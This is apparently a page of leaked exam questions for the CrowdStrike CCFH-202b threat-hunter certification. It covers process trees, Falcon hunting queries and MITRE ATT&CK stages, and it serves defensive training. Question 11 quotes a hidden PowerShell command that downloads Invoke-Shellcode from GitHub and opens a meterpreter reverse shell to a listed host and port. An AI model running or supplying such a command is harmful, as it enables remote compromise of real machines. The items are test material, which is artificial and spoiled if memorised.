Spring Sale - Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70dumps

CCFH-202b Questions and Answers

Question # 6

You receive an alert for the following process tree:

w3wp.exe > powershell.exe > cmd.exe > whoami.exe > net1.exe Which of the following describes what has occurred?

A.

Reconnaissance commands run via a webserver compromise

B.

Webserver troubleshooting user access issues by querying whoami and net1

C.

Email gateway automating routine tasks for networking configuration

D.

Email gateway validating user permissions with whoami and network status with net1

Full Access
Question # 7

You see a large number of command-line processes calling back to an unusual domain that you are reviewing with the Bulk Domain Investigate dashboard. What should your next steps be?

A.

Place a block rule within your gateway firewall while you perform an investigation of the domain to verify reputation

B.

Review the domain reputation along with the network connection history to identify potentially malicious activity

C.

Utilize the Hosts Investigate dashboard to see what other machines have been communicating with that domain

Full Access
Question # 8

You are investigating an alert for a process that connected to the following suspicious domain: reallysuspiciousdomain[.]com. Which of the Investigate dashboards would provide a list of processes that looked up the specified domain?

A.

IP addresses

B.

Bulk domains

C.

Geo location activity

D.

Remote access graph

Full Access
Question # 9

Which built-in hunting report helps you find executables from the Recycle Bin?

A.

Indicator Activity

B.

Command Line and ASEP Activity

C.

Executables running from Recycle Bin

D.

Detection Activity

Full Access
Question # 10

Which hunting query's results could indicate that an adversary is performing reconnaissance from a specific host?

A.

#event_simpleName=ProcessRollup2 | aid=?aid | ImageFileName=/ (? < FileName > [^\\\/]*)$ / | FileName=/^(explorer|lsass|svchost|smss|winlogon|userinit)\.exe$/i | table([aid, UserName, ParentBaseFileName, ImageFileName, CommandLine] , limit=1000)

B.

#event_simpleName=NetworkScanEvent | aid=?aid | !cidr(RemoteAddressIP4, subnet=["224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/32"]) | table([aid, UserName, ParentBaseFileName, ImageFileName, CommandLine] , limit=1000)

C.

#event_simpleName=NetworkConnect* | RemotePort=?RemotePort aid=?aid | !cidr(RemoteAddressIP4, subnet=["224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/32"]) | table([aid, LocalAddressIP4, LocalPort, RemoteAddressIP4, RemotePort] , limit=1000)

D.

#event_simpleName=ProcessRollup2 | aid=?aid | ImageFileName=/ (? < FileName > [^\\\/]*)$ / | FileName=/^(net|ipconfig|whoami|quser|ping|netstat|tasklist|hostname|at)\.exe$/i | table([aid, UserName, ParentBaseFileName, ImageFileName, CommandLine] , limit=1000)

Full Access
Question # 11

You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:

powershell.exe Windowstyle Hidden noprofile noexit -c IEX ((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force

What is this command doing?

A.

Using PowerShell to perform a discovery scan of 172.17.0.21 on port 8080

B.

Utilizing PowerShell to force a connection to a reverse shell originating from GitHub

C.

Utilizing PowerShell to download a reverse shell from GitHub and executing it to create a connection

D.

Using WMI to update the PowerShell execution policy on a remote host

Full Access
Question # 12

An attacker created a scheduled task which executes a remote management application. Which MITRE ATT & CK Matrix for Enterprise stage is this an example of?

A.

Persistence

B.

Lateral Movement

C.

Privilege Escalation

D.

Gaining Access

Full Access
Question # 13

You get a detection for a malicious PowerShell script with the process flow below:

Unknown Process - > chrome.exe - > wscript.exe - > powershell.exe Which process should you investigate further to identify the source of the script?

A.

chrome.exe

B.

wscript.exe

C.

Unknown Process

D.

powershell.exe

Full Access
Question # 14

Which statement will filter for all events that correspond to a new scheduled task registered by the user "Doris"?

A.

#event_simpleName=ProcessRollup2 FileName="*.sht" | UserName="Doris"

B.

#event_simpleName=ScheduledTaskRegistered | UserName="Doris"

C.

#event_simpleName=ProcessRollup2 ProcessName="taskmgr.exe" | UserName="Doris"

D.

#event_simpleName=NewScheduledTaskRegistered | UserName="Doris"

Full Access
Question # 15

Which pre-defined reports will show activities that typically indicate suspicious activity occurring on a system?

A.

Sensor reports

B.

Timeline reports

C.

Scheduled searches

D.

Hunt reports

Full Access
Question # 16

Which action helps identify an enterprise-wide file infection?

A.

Monitor the Falcon Console for alerts on suspicious process activity

B.

Analyze the Investigate Host dashboard to identify endpoints with high-risk file activity

C.

Utilize CrowdStrike Query Language (CQL) to search for files with the same hashes that have been renamed

D.

Utilize the IP addresses Investigate dashboard to find the hosts' processes that are connecting to an unusual IP

Full Access
Question # 17

You've experienced a ransomware infection that has spread throughout the enterprise. What is the first step you would take to determine the source of infection?

A.

Perform a PowerShell hunt to look for suspicious PowerShell commands

B.

Use Advanced Event Search to timeline encryption activity and determine the system with the first encryption event

C.

Utilize Exposure Management to identify systems with critical vulnerabilities that could be exploited

D.

Perform reverse engineering on the malware sample to see if you can find the infection vector

Full Access
Question # 18

Falcon is generating detections for a malicious file evil.exe with varying filepaths on several hosts as end users attempt to execute the file. Which query can be used to proactively hunt where the file exists prior to the user executing it?

A.

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2 | ImageFileName=/evil.exe/i | ImageFileName=/([\/\\])(? < FileName > \w*\.?\w*)$/ | stats count by aid, hostname, FileName, ImageFileName, CommandLine

B.

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2 | aid=?aid | ImageFilePath=/C:\users\/ | ImageFileName=evil.exe | table([aid, hostname, FileName, ImageFileName, CommandLine], limit=1000)

C.

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2 | aid=?aid | ImageFilePath=C:\users\*\evil.exe | table([aid, hostname, FileName, ImageFileName, CommandLine], limit=1000)

D.

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2 | ImageFileName=/evil.exe/i | ImageFileName=/([\/\\])(? < FileName > \w*\.?\w*)$/ | table([aid, hostname, FileName, ImageFileName, CommandLine], limit=1000)

Full Access